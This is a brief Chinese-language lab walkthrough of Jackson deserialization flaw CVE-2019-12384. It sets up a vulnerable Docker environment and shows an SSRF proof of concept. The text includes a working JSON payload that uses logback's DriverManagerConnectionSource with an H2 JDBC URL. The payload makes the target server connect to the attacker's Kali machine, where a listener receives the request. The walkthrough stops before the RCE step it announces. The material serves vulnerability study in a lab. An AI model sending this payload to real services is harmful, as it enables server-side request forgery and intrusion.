jackson-cve-2019-12384
当Jackson库对 JSON 进行反序列化的时候,存在反序列化漏洞,控制好反序列化的类,就能触发服务端请求伪造(SSRF)和远程代码执行漏洞(RCE)。
漏洞原理和分析参考:
运行漏洞环境:
git clone https://github.com/cnsimo/vu1hub.git
cd vu1hub/jackson/CVE-2019-12384-RCE/
docker-compose up -d
服务器IP:192.168.88.13
攻击机kali:192.168.88.141
1、漏洞利用
1.1、SSRF
1.1.1、POC
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://192.168.88.141:1234/~/test"}]
1.1.2
Kali 开启监听
1.1.3
Content-Type: application/x-www-form-urlencoded
收到来自服务器的请求